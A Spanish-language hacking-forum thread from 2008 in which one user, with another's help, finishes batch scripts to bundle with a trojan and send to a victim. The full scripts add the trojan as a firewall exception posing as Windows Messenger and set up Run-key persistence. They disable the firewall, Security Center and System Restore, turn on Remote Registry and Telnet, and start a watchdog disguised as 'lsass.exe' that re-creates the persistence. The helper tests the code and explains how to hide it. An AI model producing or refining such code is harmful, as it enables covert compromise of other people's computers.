Como hacer funcionar este batch perfectamente?

Iniciado por SoloAki, 7 Enero 2008, 00:53 AM

0 Miembros y 1 Visitante están viendo este tema.

SoloAki

Citar:r
ping 127.0.0.1 /n 20
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor] /d "[Ejecutable]" /f
goto r

Esto es para que se vuelva a autocopiar si se borra jeje.. el Nombre de valor exactamente que se tendria que poner? en Ejecutable seria el nombre del bat? No entendi muy bien eso jeje.

CitarCódigo:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled:  Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
ping 127.0.0.1 /n 20
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor] /d "[Ejecutable]" /f
goto r
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle

Stacker

#31
Acorde a tu ejemplo:
Citar:r
ping 127.0.0.1 /n 20
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\1234\ctfmon.bat" /f
goto r

Pero no tienes que añadirlo al codigo que ya tenias, es otro EXE, lo que los hara independientes (de ahi que te dije que lo podias llamar lsass.exe). El motivo es que no se pueden ejecutar dos bucles infinitos en un mismo batch, pero si son paralelos sí.

Para ejecutarlo al tiempo que el otro solo tendrias que añadir start %windir%\system32\1234\lsass.exe - lsass.exe puede tener cualquier otro nombre, pero si es igual al de algún proceso critico, el administrador de tareas no podrá finalizarlo.

Citar@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled:  Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
start %windir%\system32\1234\lsass.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle

Este falso lsass.exe comprobará mediante el bucle r si existe el valor en el registro. Para ello intenta leer su contenido, si no hay errores (%errorlevel%==0) continua con el bucle, pero si %errorlevel%==1 vuelve a crear el valor en el registro.

Esto lo puedes usar también con cualquier otro valor o archivo (añadiendolo al código de lsass.exe), por ejemplo la excepción del firewall.

Saludos.

SoloAki

@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled:  Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
start %windir%\system32\1234\lsass.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle

si ejecuto este .bat primero sin haber subido el otro bat llamado lsass.exe no pasar nada verdad? Pienso adjuntar este bat con el troyano y luego que tengo la victima subirle el otro bat solo me queda la duda si es que no se dañara el bat al ejecutar esa parte aunque no haya subido el otro bat. Si pudieses probarlo en tu virtual machine me haces un gran favor :P lo voy a psar con el quick batch compiler.

Stacker

Solo tienes que añadir un if, de lo contrario resultaria un mensaje de error que incluso daria a conocer la ruta en la que deberia estar:

if exist %windir%\system32\1234\lsass.exe ( start %windir%\system32\1234\lsass.exe )

Lo he probado y funciona todo correctamente.

Supongo que te habrás dado cuenta que ctfmon tiene la extensión .bat (para ser oculto debe estar compilado) y que también has agregado este como excepción del firewall (debe de ser el server del troyano).  ;D

Suerte

SoloAki

es parte dices?

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled:  Windows Messenger"

Voy a adjuntar este .bat con un troyano pero para agregarlo a las excpeciones al troyano.

Yo ahi entonces seria asi.

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server /t REG_SZ /d "%windir%\ctfmon\1234\server:*:Enabled:  Windows Messenger"

Asi hago la excepcion del troyano no ? :D Creo que ya esta si me dices estaria todo terminado

Stacker

CitarAsi hago la excepcion del troyano no ?
Sí, asi está bien, ya que el bat no accederá nunca a la red sino otros programas que este pueda llamar o simplemente que ya estuvieran ahi.

Ej(bo.exe es un ejemplo):
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v bo.exe /t REG_SZ /d "%windir%\ctfmon\1234\bo.exe:*:Enabled:  Windows Messenger"


De todas formas puede que el troyano ya se encargue de saltar el firewall por si solo. Es decir, las excepciones las tendrias que crear para este tipo de ejecutables que si que conectan a la red.


Me refereria también a que en el ctfmon.bat al no estar compilado será visible la ventana de simbolo del sistema.

Si no tienes ningún problema con esto creo que ya todo funciona bien.

Saludos

SoloAki

Sisi al .bat lo voy a compilar con algun programa como el Quick Batch Compiler y listo :) La velocidad del bat en ejecutarse seguramente sera mas rapida que antes, y no levantara sospechas con alertas y mensajes xD.

SoloAki

Bueno creo que ya estarian los .bat estos son los finales me decis si esta bien y si no me falta nada? :P

CitarCódigo:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
if exist %windir%\system32\1234\lsass.exe ( start %windir%\system32\1234\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle

Y el otro .bat seria asi.

Citar:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v lsass
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\1234\ctfmon.bat" /f
goto r

Bueno ahi estarian los 2 .bat finales que despues los voy a pasar a .exe

Stacker

Entonces esta todo bien.

Handle with care  ;D

Suerte

SoloAki

Okas gracias a todo !! Stacker sos un groso :D jajaja. Despeus de terminar algunas cosas del troyano lo compilo al .bat y lo mando :D jaja. Mas tarde lo posteo en troyanos compilado puede que a la gente le sirva! Bye bye <.<